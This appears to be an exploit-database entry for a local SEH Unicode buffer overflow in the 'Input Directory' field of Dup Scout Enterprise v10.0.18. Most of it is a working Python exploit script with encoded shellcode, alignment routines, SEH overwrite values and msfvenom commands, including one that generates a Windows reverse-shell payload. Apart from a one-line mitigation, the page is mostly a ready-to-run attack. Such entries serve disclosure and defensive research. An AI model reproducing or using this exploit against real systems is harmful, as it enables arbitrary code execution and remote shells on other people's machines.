Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode

vendor:

Dup Scout Enterprise

by:

Miguel Mendez Z

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Dup Scout Enterprise

Affected Version From: v10.0.18

Affected Version To: v10.0.18

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x86

2017

Dup Scout Enterprise v10.0.18 “Input Directory” Local Buffer Overflow – SEH Unicode

The exploit allows for a local buffer overflow in the "Input Directory" field of Dup Scout Enterprise v10.0.18. It takes advantage of a SEH (Structured Exception Handler) Unicode vulnerability.

Mitigation:

Apply the latest patch or update to a version of Dup Scout Enterprise that is not affected by this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
import struct

########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode
# Date: 29-11-2017
# Software: Dup Scout Enterprise
# Version: v10.0.18
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Tested on: Windows 7 x86
########################################################################################################


'''
[+] Paso 1
Bytes Validos:
\x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a
\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f
\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65
\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75
\x76\x77\x78\x79\x7a
----------
[+] Paso 2:
Align ESP:
popad * 49
----------
[+] Paso 3:
Assembly Align EAX:
xor eax,eax
push esp
pop eax
pop ecx
add eax 1c
jmp eax -----> (inicio shellcode)
----------
[+] Paso 4:
Codificacion:
and eax,554E4D4A
and eax,2A313235
sub eax,65656565
sub eax,65654C65
sub eax,54363176
push eax
sub eax,33354D35
sub eax,2A707737
push eax

Byte Paste:
254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50
'''

popad = "\x61"*49
alignEsp = popad+(
	"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31"
	"\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C"
	"\x65\x65\x2D\x76\x31\x36\x54\x50\x2D"
	"\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A"
	"\x50"
	)

'''
msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw)
msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed  BufferRegister=EAX -f python
'''
shellcodeTest = (
	"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A"
	"BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk"
	"42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw"
	"LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS"
	"wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam"
	"7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi"
	"QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB"
	"Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL"
	"eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA"
	)

#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixed  BufferRegister=EAX -f python
shellcode  = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45"
shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b"
shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66"
shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47"
shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35"
shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f"
shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62"
shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c"
shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66"
shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71"
shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30"
shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71"
shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68"
shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d"
shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31"
shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56"
shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43"
shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50"
shellcode += "\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31"
shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f"
shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31"
shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58"
shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62"
shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68"
shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53"
shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30"
shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51"
shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f"
shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56"
shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58"
shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53"
shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45"
shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64"
shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c"
shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59"
shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69"
shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31"
shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76"
shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e"
shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64"
shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71"
shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38"
shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d"
shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50"
shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49"
shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78"
shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37"
shellcode += "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50"
shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30"
shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41"

offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest))
nseh   = "\x71\x20" # jno short 34
nseh  += "\x70\x20" # jo short 34
seh    = struct.pack("<L",0x6521636C) # pop ebx # pop ecx # ret (Bytes Buenos)
junk   = "\x42"*26+alignEsp+"\x42"*6000

payload = offset+nseh+seh+junk

print "\nSize Buffer: "+str(len(offset))
print "Size Payload: "+str(len(payload))
print "\n--------------EXPLOIT--------------\n"
print payload
print "\n----------------------------\n"

file=open('poc_dup.txt','w')
file.write(payload)
file.close()

# @s1kr10s